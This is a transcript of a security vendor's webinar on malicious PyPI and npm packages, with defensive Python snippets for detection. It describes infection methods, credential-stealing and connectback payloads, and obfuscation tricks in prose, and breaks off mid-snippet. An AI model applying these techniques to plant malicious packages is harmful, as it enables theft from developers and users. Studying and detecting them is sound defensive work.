Identifying and Avoiding Malicious Packages

Securing your software supply chain is absolutely critical as attackers are getting more sophisticated in their ability to infect software at all stages of the development lifecycle. This webinar, hosted by JFrog Director of Threat Research Jonathan Sar Shalom, will be a technical showcase of the different types of malicious packages that are prevalent today in the PyPI (Python) and npm (Node.js) package repositories. All examples shown in the webinar will be based on real data and malicious packages that were identified and disclosed by the JFrog security research team.

We will dive into:

  • The types of attacks and types of payloads contained in these malicious packages
  • How these malicious packages can be identified and rejected
  • Best practices for a secure development workflow and relevant OSS tools to use
  • Conclusion / Q&A

Video Transcript

Host: Thank you so much, everyone, for joining “Identifying and Avoiding Malicious Packages!” We’re really excited to have you here; we have a lot of great content to present to you. I’d love to introduce you to our Director of Threat Research at JFrog Security, Jonathan Sar Shalom.

Jonathan Sar Shalom: Hello everyone, my name is Jonathan and I’m the Director of Threat Research at JFrog Security. Our topic for today is identifying and avoiding malicious packages. We’re going to learn the technical details of the world of malicious packages, as well as how to identify and prevent an infection by one. A few words about myself: my background includes more than 13 years in cybersecurity, with experience in security research, reverse engineering, and malware analysis. Nowadays, I’m leading the Threat Research team at JFrog Security, specializing in vulnerability analysis, threat intelligence research, and automated threat detection.
As for the agenda, we will first introduce the security threat inherent in the supply chain and learn the key role that malicious packages play in it. Then we will dive into the technical details of malicious packages: infection methods, common payloads used in malicious packages, and how attackers hide the malicious code in them. After that, we will take a look at real code examples of malicious packages; the majority of the examples we will present are real malicious packages that were found by JFrog security researchers and were publicly disclosed. Finally, we will present techniques to detect and prevent malicious packages, both known and unknown, and show best practices for secure code development to avoid and mitigate the risk of malicious packages.
When we talk about the malicious packages security threat, we first need to understand the bigger problem that malicious packages are a part of: supply chain attacks. In modern software development, many applications integrate third-party software in their code and trust that third party to supply secure and stable software.
In reality, this practice also involves some danger, of course, because third-party software might contain vulnerabilities or malicious code that will be delivered through the supply chain together with the software itself. These vulnerabilities and malicious code will eventually affect the end product that depends on it. Essentially, a software supply chain attack is a technique in which an adversary slips malicious code, or an entire malicious component, into a trusted piece of software or hardware. From a technical point of view, if you look at the term here on this slide, you will see that no single target is involved in this attack, because when you attack a supply chain by infecting a software package, for example, you eventually end up attacking all of the end consumers of this supply chain. So you can already understand the first reason why an attacker would go for the supply chain approach: the high distribution of the attack.
Let’s now talk about the effort an attacker needs to invest in a supply chain attack compared to the classic targeted attack that we’ve seen a lot over the last 20 or 30 years; it will help you understand why this attack method became so popular recently. In classic targeted attacks, attackers have to invest a lot of time and money into compromising a single target, and it becomes even harder when the target is a well-known software platform, because those platforms are highly maintained and secured compared to the many relatively small software packages that are out there. So for a targeted attack, an attacker needs high technical skills, because it essentially involves finding a vulnerability and developing a working exploit for it. You can take a look at the pricing table here on the right, taken from Zerodium, which is an exploit acquisition platform.
You can see that a remote code execution exploit can cost up to $1 million for a single exploit, where the most expensive one is a zero-day remote code execution (RCE) exploit for Windows. When attacking through open-source software, on the other hand, the options are endless. There are many packages out there, so the attacker simply has to find a single package to attack, or publish a single malicious software package, and it’s game over for all the consumers in the supply chain of this package. As we said, this essentially abuses the trust that exists between parties in the supply chain, which is what makes this attack method so effective.
There are three different types of supply chain threats. Two of them are based on software vulnerabilities, either unintentional or intentional ones. Those vulnerabilities usually refer to software bugs, where each bug is normally assigned a CVE identifier. CVE is a common standard for describing vulnerabilities and exposures, and CVEs are widely used to document and track vulnerabilities in software. The third type of supply chain threat, here on the right side of the slide, is the one we’re going to focus on today: the malicious component, or malicious software package. Usually a CVE is not assigned to this type of threat, and the entire package, or a specific version of the package, is simply tagged as malicious.
Let’s give real-life examples for each. For the unintentional bug we have, of course, the infamous Log4Shell vulnerability that shook the world a few months ago. The Log4j package is heavily used by Java projects, so the global effect of this vulnerability was really huge. For the intentional bug, we can see the also famous SolarWinds attack, in which the SolarWinds Orion software platform was attacked and a backdoor was injected into it. Thousands of consumers of this software were affected by the attack, leading to even more follow-up attacks that were carried out later.
In this presentation, of course, we’re going to focus on the malicious component threat, and here we can see an example from one of our publications on malicious packages, specifically Python packages that we found and disclosed recently.
So after introducing supply chain attacks and how malicious software packages play a key role in them, let’s dive into the technical details. First we’ll start with the infection methods attackers use for spreading malicious packages. There are several main infection methods that we will present: typosquatting, masquerading, Trojan packages, dependency confusion (or namesquatting), and package hijacking.
The first infection method is called typosquatting. Typosquatting is the practice of obtaining, or squatting, a popular name with a slight typographical error. This practice applies to many different resources, such as web pages, executable names, and also software package names, which we’re going to focus on today. Let’s take one classic example: buying the domain gogle.com instead of the legitimate, well-known google.com, hoping that users will occasionally make a typing error and reach the illegitimate domain. This can then be used for any kind of attack payload, such as phishing and code injection attacks. In a trend we are seeing recently, some maintainers and developers of software packages are taking an active role and actually reserving typosquatting names for their projects, to prevent attackers from taking control of them. Regarding our example of gogle.com, Google actually registered this domain, so if you browse to gogle.com you will end up being redirected to google.com. Here you can see the first example we will show today of a malicious package.
It uses the typosquatting infection method. This package was detected in a recent research conducted by our researchers in JFrog Security, using automated heuristic scanners that detect malicious activity in open-source packages. We will elaborate on the heuristic detection of malicious packages later, but in this specific case the scanners found that the software package contains a payload with cryptominer activity. As for the specific typosquatting attack that was used here, the malicious package name mplatlib, which you can see here in the console, is very similar to the legitimate package matplotlib, which you can see here on the PyPI site. As you can see in the console log, at the time of the research the malicious package could be installed by a simple typo. Of course, this package, as well as other malicious packages, was reported to PyPI and has since been removed.
Besides typosquatting, there is an interesting trend of another infection method, masquerading, in which malware authors completely duplicate a well-known package. The attackers duplicate both the code and the metadata of the original project they would like to impersonate, and then add a small piece of malicious code to this duplicate, essentially building a Trojan package. This infection method is similar to typosquatting in that the attackers use a name similar to the legitimate package name, but the difference is that they aim to deceive developers through similarity to the legitimate package, rather than aiming for accidental use through typos. Here you can see an example, the malicious package markedjs, which was found during one of our latest research projects, from last month actually. You can see that the name and metadata of the malicious markedjs package were copied from the original Marked package, making it very hard to distinguish between the two. The URL
of the repo is the same, as well as the homepage, the description, and the entire metadata. The only thing that is different here is the package name, which is markedjs instead of Marked, and this can confuse developers into installing the markedjs package. When comparing the code of the malicious markedjs package with the code of the original Marked package, we can see that the only difference from the original package is one line in a single file. This is the long line here, marked in black. You can see that this line does not contain readable code and that it resides between other legitimate, readable lines. This is actually the obfuscated malicious code, which is the only addition to the original legitimate package, making this modified package fully functional on the one hand, but also malicious on the other. We will talk later about the obfuscation techniques that are often used by attackers, but one thing to remember for now is that, since this line is buried inside the rest of the package, which contains a lot of legitimate code, it would be very difficult to find this line without automated scanning or other tools.
Another infection technique is the Trojan package. In this infection method, the attacker publishes a fully functional library but also hides malicious code in it. As in the masquerading method, the malicious code is usually small and obfuscated, so it is hard to detect and to differentiate from the legitimate functionality of the package. In the screenshot here, you can see an example of the readme file of a very interesting Trojan package called Lemaaa. This malicious Trojan package was caught by our scanners in one of our latest published research projects. This package is a utility for Discord account hacking, intended for use by malware authors to hack Discord accounts.
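
Both typosquatting and masquerading rely on a package name that is almost, but not quite, the name of a well-known package. As a minimal sketch of how such names could be flagged, the Python below compares a candidate name against a short list of known packages using edit distance. The list, the function names, and the "one third of the name length" threshold are assumptions made for illustration; this is not the logic of the JFrog scanners.

```python
def edit_distance(a: str, b: str) -> int:
    """Classic Levenshtein distance (insertions, deletions, substitutions)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution or match
        prev = curr
    return prev[-1]


def closest_lookalike(name, known_packages):
    """Return the known package that `name` closely imitates, or None.

    An exact match is the legitimate package itself, so it is not flagged.
    The tolerance (a third of the known name's length) is an arbitrary
    illustrative choice and will produce false positives on real data.
    """
    best = None
    for known in known_packages:
        if name == known:
            return None
        distance = edit_distance(name, known)
        limit = max(1, len(known) // 3)
        if distance <= limit and (best is None or distance < best[1]):
            best = (known, distance)
    return best[0] if best else None


# Hypothetical allow-list of popular package names.
KNOWN = ["matplotlib", "marked", "requests"]
print(closest_lookalike("mplatlib", KNOWN))   # name from the typosquatting example
print(closest_lookalike("markedjs", KNOWN))   # name from the masquerading example
```

A check like this only looks at names, so it would complement, not replace, scanning the package code itself.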
First of all, a short break to explain the Discord network for those of you who are not familiar with it. Discord is a communication app with hundreds of millions of registered users that allows voice calls, video calls, text messaging, and more. The identity of a user in the Discord network is represented by a string called the Discord token, which is basically a set of letters and numbers that acts as an authorization code for accessing the Discord servers. It is effectively a user credential that can give an attacker full access to the victim’s Discord account.
So, going back to the Lemaaa library: as we said, the library itself is a fully functional published library, which is actually meant to be used by attackers to steal Discord tokens. The interesting story here is that the Trojan code in this package aims to steal the Discord tokens from any attacker who uses this library for token stealing. When the library is used, it will hijack the secret Discord token given to it, in addition to performing the requested utility function. Take a look at the malicious code of this library. Here in the obfuscated code, you can see this function, which contains a payload that hijacks the supplied Discord token and sends it to a hard-coded web URL, which you can see here, essentially sending the token to an attacker-controlled site. In the de-obfuscated code here at the bottom, we can confirm that the function name is “remove all friends”, and we can see that it uses an HTTP POST request to send the supplied token. Regarding the obfuscation: since the function is in a malware library itself, it’s actually not overly suspicious that its code is obfuscated, and thus novice malware authors may trust this module even with its obfuscation.
The next infection method is called dependency confusion, and it exploits a vulnerability in the way many package managers, for example pip or npm, download dependencies during the build process. The vulnerability resides in the fact that most package managers do not distinguish between internal packages hosted on internal company servers and external ones hosted on public servers. Thus, a simple command such as pip install my-package could grab my-package from either an internal or a public server. In the dependency confusion method, the attacker takes the specific name of an internal package of a specific target and publishes a malicious package with this exact name on an external public repository. Usually the attacker also assigns a very high version number to this published package. In this scenario, most package managers in their default configuration will, as we said, prefer to download the external malicious package because it has a higher version number, rather than downloading a lower version number from the legitimate internal repository.
We can see here in this screenshot a nice example from a research that was published last year by a security researcher named Alex Birsan. What we can see in the screenshot is a publicly available package in PyPI with a name that looks like an internal package of Netflix (you can see the ntfx here) and a version number of 6969, which is very high. With this attack, Birsan managed to successfully exploit Netflix, as well as Apple, Microsoft, and other giants, by making their servers download the malicious external package instead of the legitimate internal one.
Another example of a dependency confusion attack can be found in a research that we at JFrog Security published this past December. The list of malicious packages that we detected as part of that research contains many packages that use the typosquatting attack method.
We can also see one package that was probably spread using a dependency confusion attack. It can be easily detected by its ridiculously high version number, which is generally not used in normal product versioning; you can see it here.
The last infection method we will talk about is package hijacking. This method involves taking over a legitimate, well-known package and pushing malicious code into it. While this is not an easy task, it is very effective, because it takes advantage of the popularity of well-known packages to achieve a high infection rate. The hijacking is usually performed by hacking maintainers’ and developers’ accounts, or by injecting hidden or obfuscated malicious code as part of a seemingly legitimate code contribution to an open-source project. Several months ago, it was detected that several notable packages were attacked and hijacked by taking over the maintainer accounts and pushing malicious code into several versions of those packages. In this screenshot you can see one of the hijacked packages, called UAParser.js. This is a very popular package, with almost 1 billion downloads to date. The interesting thing about this package is that the malicious code injected into it was the same as in another malicious package that had originally masqueraded as this UAParser.js package. We can see here the announcement by the developer of the package, saying that he believes someone hijacked his package and published malicious versions of it. This incident and other recent incidents made GitHub actually enforce two-factor authentication for maintainers and admins of popular npm packages.
By the way, it is also worth mentioning the publicized incident of the well-known npm packages faker and colors, where their maintainer intentionally sabotaged his own popular packages, adding a sort of infinite loop into their code, which broke thousands of projects that depend on them.
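
The dependency confusion scenario described above comes down to a version comparison: the resolver prefers the public copy when its version is higher than the internal one. The sketch below, in Python, shows that comparison in isolation. The function names and the simplified version parsing are assumptions for illustration; real resolvers follow full versioning rules (for example PEP 440 for Python) that this sketch does not implement.

```python
import re


def parse_version(version: str) -> tuple:
    """Turn '1.2.3' into (1, 2, 3). Simplified: keeps only the numeric parts."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def public_copy_would_win(internal_version, public_version):
    """Return True if a same-named public package outranks the internal one.

    `public_version` is None when no package with that name exists publicly.
    """
    if public_version is None:
        return False
    return parse_version(public_version) > parse_version(internal_version)


# An internal package at 1.2.3 versus a public package at 6969.0.0,
# mirroring the very high version number shown in the talk.
print(public_copy_would_win("1.2.3", "6969.0.0"))
```

Running a check like this for every internal package name against the public registries is one way to notice that someone has claimed an internal name externally.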
You can pretty much say that he hijacked his own project and caused a lot of damage by doing that.
So, now that we have presented the infection methods used by malicious packages, we can continue to the payload phase. After a successful infection, the attacker behind a malicious package would usually like to execute a payload that serves his needs. So we will present some very common payloads that are executed in malicious packages. We will mention and analyze sensitive data stealers that grab user data, connectback shells, download-and-execute payloads, and, of course, the very popular payload of cryptominers.
The first payload we will take a look at is a sensitive data stealer, which steals credit card information from the autocomplete feature that we have in modern web browsers. Essentially, for autocomplete to work, modern browsers save previously typed user information in their databases, such as addresses, passwords, and credit card information. This is very convenient for the user, but the downside is that this information can be leaked by malicious actors that get access to the local machine. In the code snippet here we can see the payload code of a malicious package called noblesse, which we found in one of our research projects last year. We can see that the malware tries to steal credit card information from the Chrome browser by connecting to its database (you can see the connection string here) and querying for credit card information, which you can see in this SQL query. Essentially, the package sends this information to the attacker, so this is a very dangerous payload. Additionally, the same malicious package also tries to steal saved passwords, in this case specifically from the Edge browser database. You can see the path of the saved-passwords database that the malicious code connects to, and then the SQL query for retrieving those passwords.
Another interesting data stealer is the Discord token stealing payload. This payload simply tries to steal the user’s Discord token, which we already mentioned earlier. The stolen Discord tokens can be used to log into the victim’s Discord account, so the account can be used, for example, as a proxy in a future attack, or be used to spread malware to other Discord users who trust the hacked account. Or, when the attacker is lucky enough to come across a premium account, they can sell it and actually make a profit from it.
It is also very attractive for a payload to steal information from environment variables, so this is another data stealer payload: the environment variable stealer. In a research we conducted last December, we disclosed 10 malicious packages that performed environment variable theft. Those packages were spread by a typosquatting attack, and it was noticeable that they do not contain any legitimate functionality, but rather a small snippet of malicious code, which is possible to understand even when obfuscated, as we can see here in the code snippet. In the code snippet you can see that the malware gathers all of the victim process’s environment variables and posts them to a remote URL; you can see the POST request here. This is a dangerous payload, since environment variables are a prime location for keeping secrets that need to be used by running software. This is a common practice in production systems, because keeping secrets in the runtime environment is considered safer than keeping them in storage or passing them via command-line arguments. Here you can see an example of such data, specifically for the AWS command line interface, which supports getting the AWS secret access key from an environment variable. This is a very common practice for AWS deployments, as can be seen in the above configuration example.
The next payload type is the connectback shell.
The purpose of this payload type is simply to receive remote commands for execution on the victim’s machine. Generally, this payload has three simple steps: first, connecting back to the attacker’s server; then receiving commands to execute; and then sending the execution results back to the server.
Let’s take a look at an example from other malicious packages that we found and disclosed in JFrog Security very recently, in the last month. These are two Trojan packages named hpid and hipid, which are Python libraries that are supposedly meant for hiding processes in Linux through an API they provide called “hide processes”. In reality, when this API is called, it also calls the function “release elf”, which you can see here, and which installs a connectback shell that is aimed exclusively at Linux target machines. Let’s take a look at this malicious “release elf” function. We can see that the code decodes a base32-encoded Trojan binary; you can see it here. It is interesting that this binary is embedded in the Python code as base32, because this is an uncommon encoding compared to base64, which is widely used. The base32 encoding may have been used for evading automated scanners that do not expect this kind of encoding. After the decoding, the Trojan binary is written to the path of the “syslogd” binary, which you can see here, simply replacing it. Also, you can see that the owner, permissions, and timestamp are copied to this new file from another system file, to make the Trojan file look similar to other system files and avoid detection. You can see it here with the chown, chmod, and touch commands. In the last line, the Trojan file is executed using the “popen” function.
Next, the dropped Trojan is executed. It is actually an ELF file that is quite small and obfuscated. When executed, it performs the three steps of a classic connectback shell that we already described.
It connects back to the attacker’s server, receives commands to execute (you can see the “popen” here), and then sends the execution results back to the attacker’s server after encrypting them.
The last payload we will talk about is the cryptominer payload. This payload utilizes the victim’s system resources for mining cryptocurrency. We’re not going to dive into the technical details of crypto mining due to time constraints, but keep in mind that this is a very common payload type in malicious packages, simply because of the nature of malicious package attacks. As you remember, most of the time malicious packages are not used in a targeted attack, but are rather spread to as many victims as possible with all of the infection methods we mentioned earlier, so utilizing a lot of system resources from many victims makes a payload such as a cryptocurrency miner profitable. In this code snippet you can see the payload of the “maratlib” package, another malicious package that we recently detected and that was spread using a typosquatting attack. In the code snippet above you can see that, as part of the setup code of this package, it also downloads and executes the remote bash script “aza.sh”. In the screenshot below, we can see the code of this bash script, which in turn downloads and executes a known cryptominer called “PhoenixMiner”. This is the actual payload, the actual cryptominer, which sends its proceeds to the attacker’s wallet; you can see here the wallet address for the cryptocurrency being mined.
So, now that we have talked about the infection methods and the payloads that are usually used in malicious package attacks, we will talk about another main interest attackers have when creating a malicious package, which is hiding the malicious code.
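
The maratlib example above, where the package's setup code downloads and runs a remote script, suggests one simple static check: look for process-spawning or download calls in installation code. The Python sketch below does that with the standard `ast` module. The list of flagged call names and the sample source are assumptions chosen for illustration, and the sample is only parsed, never executed.

```python
import ast

# Calls that are unusual in installation code. This list is an illustrative
# assumption, not a complete or authoritative rule set.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen",
    "subprocess.run", "subprocess.call", "subprocess.Popen",
    "subprocess.check_output",
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "exec", "eval",
}


def dotted_name(node):
    """Rebuild a dotted name such as 'os.system' from an AST node, if possible."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def suspicious_calls(source: str):
    """Return sorted (line, call name) pairs for flagged calls in `source`."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


# Hypothetical setup.py content with a placeholder URL.
SAMPLE_SETUP = '''
import os
from setuptools import setup
os.system("curl -s https://example.invalid/install.sh | bash")
setup(name="demo", version="0.1")
'''

print(suspicious_calls(SAMPLE_SETUP))
```

A static check like this is easy to evade through aliasing or obfuscation, which is why the obfuscation techniques discussed next matter for detection.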
So besides performing a successful infection and payload execution, malicious package authors want to avoid detection of their malicious activity. To achieve a good success rate for an attack, attackers would like to avoid detection by code analysis security tools, and also to make it hard for any security researcher to reverse engineer their malicious package. A very common technique for achieving these goals is called code obfuscation. We’re going to discuss several code obfuscation techniques, including off-the-shelf public obfuscators, custom obfuscation techniques, and also the invisible backdoor, which is not an obfuscation method by itself, but rather a technique to invisibly change the source code logic without producing any visual artifacts.
Let’s take a look at a public obfuscator. This obfuscator is simply called Python obfuscator tool, and it was used in the noblesse malicious packages we found last year. The obfuscation mechanism here is simply encoding the Python code text with base64, and then decoding it at runtime, compiling it, and executing it. This is a very simple technique. In the code snippet, we can see an example of a Hello World print in Python that was obfuscated automatically with this tool. We can see the usage of base64 strings here, the decoding of them using the b64decode function, and also the compile and exec functions that are called to execute the decoded code. The obfuscation can trick a simple static analysis tool, but it doesn’t stand up to a more thorough analysis, and it actually raises a red flag that will make many security researchers take a closer look at this code. That was actually the case with this example, when our automatic malicious package detection scanners alerted on this kind of behavior.
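
The decode, compile, and execute pattern described above is easy to reproduce with a harmless Hello World, and the same pattern is what a simple detector can look for. The Python sketch below builds such a benign sample and flags source code that combines dynamic execution with a base-N decoder. The function name and the set of flagged names are assumptions for illustration; the sample is only parsed, never executed.

```python
import ast
import base64

# Build a benign sample that mimics the obfuscation pattern:
# the real code is stored as base64 text and run through compile/exec.
ENCODED = base64.b64encode(b'print("Hello World")').decode("ascii")
OBFUSCATED_SAMPLE = (
    "import base64\n"
    f'exec(compile(base64.b64decode("{ENCODED}"), "<string>", "exec"))\n'
)

DYNAMIC_EXECUTION = {"exec", "eval", "compile"}
DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode"}


def uses_encoded_exec(source: str) -> bool:
    """Return True if `source` calls both a base-N decoder and exec/eval/compile."""
    saw_dynamic = False
    saw_decoder = False
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Plain names (exec) and attribute access (base64.b64decode) both count.
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name in DYNAMIC_EXECUTION:
            saw_dynamic = True
        if name in DECODERS:
            saw_decoder = True
    return saw_dynamic and saw_decoder


print(uses_encoded_exec(OBFUSCATED_SAMPLE))
print(uses_encoded_exec('print("Hello World")'))
```

Including `b32decode` in the flagged set reflects the base32 variant mentioned earlier in the talk; a co-occurrence check like this is a red flag for review, not proof of malice.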
Let’s take a look at another obfuscation technique, a more complex one, called control flow flattening. In this technique, the structure of the code’s control flow is broken into blocks that are put next to each other instead of at their original nesting levels. This method was used in a malicious package we detected called Discordlofi. The package payload was a Discord token grabber, and it was spread by the typosquatting and Trojan infection methods. We can take a look at this technique with an example from a paper that was published on the subject. Look at the original code on the left side here; we can split it into three code blocks. First we have the variable initialization at the top, then a while loop with a break condition, and finally the code block inside the while loop. On the right side, you can see the code after applying this obfuscation technique. You can see that the three code blocks are flattened and a switch-case is used to control the flow of the code. You can also see that the variable swVar here holds the ID number of the code block that is being executed right now. At the end of each code block, its value is changed to indicate the next code block that should run. So basically, with this switch-case, when the code runs it will call the next block that should run, even in a dynamic way. For example, when we look at the while-loop condition, we can end up either in code block number three or in code block number zero, which is the end of the program. This, of course, implements the while loop that we can see on the left side.
And lastly, we will talk about a technique called the homoglyph characters attack, which is not an obfuscation by itself, but can be used to hide malicious code modifications in legitimate software packages.
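
To make the control flow flattening transformation described above concrete, here is a small Python sketch of the same idea: a plain loop and a flattened version of it that is driven by a dispatcher variable. The example function and the block numbering are assumptions for illustration (the paper's example is not reproduced here), and `if`/`elif` stands in for the switch-case.

```python
def original(n: int) -> int:
    """Readable version: sum the integers 0 .. n-1."""
    i = 0
    total = 0
    while i < n:
        total += i
        i += 1
    return total


def flattened(n: int) -> int:
    """Same logic after flattening: every block sits at the same nesting level,
    and sw_var holds the number of the block to run next (0 means stop)."""
    i = total = 0
    sw_var = 1
    while sw_var != 0:
        if sw_var == 1:        # block 1: variable initialization
            i = 0
            total = 0
            sw_var = 2
        elif sw_var == 2:      # block 2: the original loop condition
            sw_var = 3 if i < n else 0
        elif sw_var == 3:      # block 3: the original loop body
            total += i
            i += 1
            sw_var = 2
    return total


print(original(5), flattened(5))
```

Both functions compute the same result, but in the flattened one the order of execution can no longer be read off the code structure, which is what makes manual analysis slower.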
This technique was published in the recent Trojan Source paper, which demonstrated the possibility of changing source code in an invisible way. It essentially means that the logic of the code can be changed, to contain a vulnerability for example, without producing any visual artifacts. In this technique, attackers use Unicode characters that look like standard ASCII or Latin characters. A normal reader wouldn’t notice the difference, but the compiler or the interpreter will treat them differently, so the logic of the code will be changed. This technique can be used by supply chain attackers to plant invisible backdoors in popular source code repositories. For example, an attacker might change a string literal check or a function call to make it always succeed or always fail, in an invisible manner, by changing one of the string’s characters to a homoglyph. Let’s take a look at the example in the code snippet here. These two functions appear identical; however, the bottom function name uses the Cyrillic H character that you can see here, which counts as a completely different function name. Code later in the program may call either of these two functions in an indistinguishable manner, and the logic that gets executed will be different.
Another invisible method that was introduced in the Trojan Source paper uses the Unicode bidirectional control characters. These characters are normally used to control the flow of text, either right to left or left to right, for different languages. When bidirectional control characters are used in source code, the Unicode encoding can produce strange artifacts, such as a source code line that visually appears one way but is parsed by the compiler or the interpreter in another way. For example, take a look at this code snippet on the left, which is the original code. From the reader’s point of view, the code appears not to print “you are an admin”, since isAdmin, which you can see here, is false.
However, as can be seen in the snippet on the right, if a Unicode bidi control character is inserted in the correct position in the condition check that you can see here, the check line could actually be interpreted by the compiler as a full comment, so the entire if condition can be bypassed and the logic will be changed. So, now that we know the technical information about the infection phase, the payload phase, and the obfuscation techniques used in malicious packages, let’s continue and talk about methods that we can use for detecting malicious packages in real life, for example in your development lifecycle, in a project that you develop. We will present several practical techniques for this purpose, for the detection of both known and unknown malicious packages. Let’s start with detecting known malicious packages. If we take PyPI or npm, for example, these repositories have defined processes through which users can report malicious packages. You can see here in the screenshot a package that is tagged as a security holding package, because it was accepted as a malicious package and replaced with an empty project. When we want to check for known malicious packages, the most efficient way to do it is by querying those repositories. As we want to get a complete picture of the malicious packages in our projects, we essentially need to do a few things. The first thing is to list our project dependencies and detect all of the installed third-party software versions in our project. The artifact of this process is called the software bill of materials, or SBOM, which includes all the information on the installed third-party software, which we can use later to query those public repositories.
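As a rough illustration of the dependency-listing step described above, the sketch below enumerates the Python distributions installed in the current environment with the standard library’s `importlib.metadata`. It is only a minimal stand-in for a real SBOM, which would follow a standard format and cover every ecosystem in the project; the function name `list_installed_packages` is an assumption made for this example.

```python
from importlib import metadata


def list_installed_packages():
    """Return a sorted list of (name, version) for installed distributions."""
    packages = set()
    for dist in metadata.distributions():
        try:
            name = dist.metadata["Name"]
            version = dist.version
        except Exception:
            continue  # skip distributions with unreadable metadata
        if name and version:
            packages.add((name.lower(), version))
    return sorted(packages)


if __name__ == "__main__":
    # Print the inventory in the familiar "name==version" form.
    for name, version in list_installed_packages():
        print(f"{name}=={version}")
```

The resulting name and version pairs are the kind of information that can then be checked against reports of known malicious packages.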
This process might not be easy to perform at scale as part of your software development lifecycle, so it is recommended to automate the process by using a software composition analysis tool. We can, of course, recommend our own solution for this purpose, called JFrog Xray, which is not only a software composition analysis tool but a complete solution for the management of vulnerabilities and software supply chain risk in your projects, including the capability of detecting malicious packages. Xray scans the entire development pipeline, from the code in Git, to your IDE, through your CI/CD tools, and all the way down to the distribution to production. It essentially integrates the detection and prevention of malicious components into your development and build system. When we talk about the detection of unknown malicious packages, we essentially need to find a way of identifying characteristics of malicious packages before they are known as malicious. So at JFrog, for example, we’re not only updating the Xray database with up-to-date known malicious package names and versions, but for the purpose of detecting unknown malicious packages, we also develop and run heuristic scanners that scan the code of software packages and detect anomalies in them. These scanners alert on possible unknown malicious components. The scanner infrastructure is actually the foundation for all of the malicious packages that we research, publish, and disclose. With the scanners, we were able to find new malicious packages, including the examples of malicious packages given in this webinar. This list contains examples of scanners that we developed. The way that the scanners look for new malicious packages is by trying to find evidence of malicious activity in any of the attack phases we discussed today.
It can be in the infection methods, in the payload phase, by looking for evidence of the types of payloads that we presented, and also in the hiding methods: the obfuscation techniques and any invisible characters in the code, for example. So it is theoretically possible to develop a scanner for every phase of the attack. Think about this list as a list of demonstrations of heuristic techniques. This way you can think about more techniques, if you are interested in hunting unknown malicious packages. So let’s take a few examples of scanners. For typosquatting and masquerading detection, the scanners check for similarity between popular package names and other, unpopular packages. If we see a very popular package name that closely matches an unpopular package name, we alert on that, research it, update our database, and let the world know if this is a malicious package. For dependency confusion detection, as another example, the scanners check whether internal package names, which are popular targets, appear on remote public repositories, and then, if we have a match, we can look into it and better understand whether this is a malicious package or not. For download and execute, for example, we perform automatic reverse engineering on the code of the packages to build an AST, and we try to find a connection between socket activity that downloads data from the Internet and an execution function, for example, popen or system, in Python or Node.js. This is another great example that gives us a lot of malicious packages. Let’s take one more example from the obfuscation techniques, or several short examples. We detect, for example, Base64 decoding and evaluation, just like the example that we saw earlier.
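To make the typosquatting heuristic described above more concrete, here is a minimal sketch that compares a candidate package name against a list of popular names using the standard library’s `difflib.SequenceMatcher`. This is not JFrog’s scanner: the `POPULAR_PACKAGES` sample, the function name, and the 0.85 threshold are all assumptions made for illustration, and a real scanner would work from repository popularity data and more refined similarity rules.

```python
from difflib import SequenceMatcher

# Hypothetical sample of popular package names; a real scanner would load
# a much larger list based on repository download statistics.
POPULAR_PACKAGES = ("requests", "numpy", "pandas", "urllib3", "django")


def find_lookalikes(candidate, popular=POPULAR_PACKAGES, threshold=0.85):
    """Return (popular_name, similarity) pairs the candidate closely resembles."""
    normalized = candidate.lower().replace("_", "-")
    matches = []
    for name in popular:
        if normalized == name:
            return []  # exact match: this is the popular package itself
        ratio = SequenceMatcher(None, normalized, name).ratio()
        if ratio >= threshold:
            matches.append((name, round(ratio, 2)))
    return matches
```

For instance, calling `find_lookalikes("reqeusts")` flags the name as a lookalike of `requests`, while an unrelated name returns an empty list. A match is only a signal for further research, not proof that a package is malicious.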
We also specifically managed to detect the PyArmor obfuscator, because it creates significant characteristics in the code that we could actually sign. Also, for the invisible characters detectors, the homoglyphs and the bidirectional characters are very easy to detect, because normally the source code of any software package should not contain these kinds of Unicode characters. So it was very easy for us to create those scanners, and we encourage everyone who has this interest to do so as well. We are nearing the end of the webinar, but we will not end without discussing the best practices for secure development that allow you to deal with the malicious packages security threat. The first recommendation, which is the most important and basic method to deal with malicious packages, as we said, is to use a software composition analysis tool as part of your SDLC, the software development lifecycle. You can use, of course, our tool Xray or any other software composition analysis tool available; this is the most important step. The second recommendation is to define policies and automate actions as part of your DevSecOps processes. Based on the results of the software composition analysis tool, the policy should break the build and send alerts when a malicious package is found. Unlike CVEs, of which we can find a lot in our code, we should remember that a malicious package is a very unique and very serious threat, so when we see that a malicious package was detected, we should treat it as having a high chance of being a true positive, and we actually recommend breaking the build in this case. The other thing we recommend is that you configure your build system so that it does not access remote repositories for internal packages. This is for preventing, of course, dependency confusion attacks.
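As a sketch of the invisible characters detectors mentioned above, the following example scans source text for Unicode bidirectional control characters and for non-ASCII letters that could be homoglyphs. It is a simplified heuristic written for this transcript, not JFrog’s scanner; the function name is an assumption, and flagging every non-ASCII letter will also report legitimate non-English text in comments and strings.

```python
import unicodedata

# Unicode bidirectional control characters abused in Trojan Source attacks.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
}


def find_suspicious_characters(source):
    """Return (line, column, description) for bidi controls and non-ASCII letters."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            name = unicodedata.name(ch, "UNKNOWN")
            if ch in BIDI_CONTROLS:
                findings.append((line_no, col, "bidi control " + name))
            elif ord(ch) > 127 and ch.isalpha():
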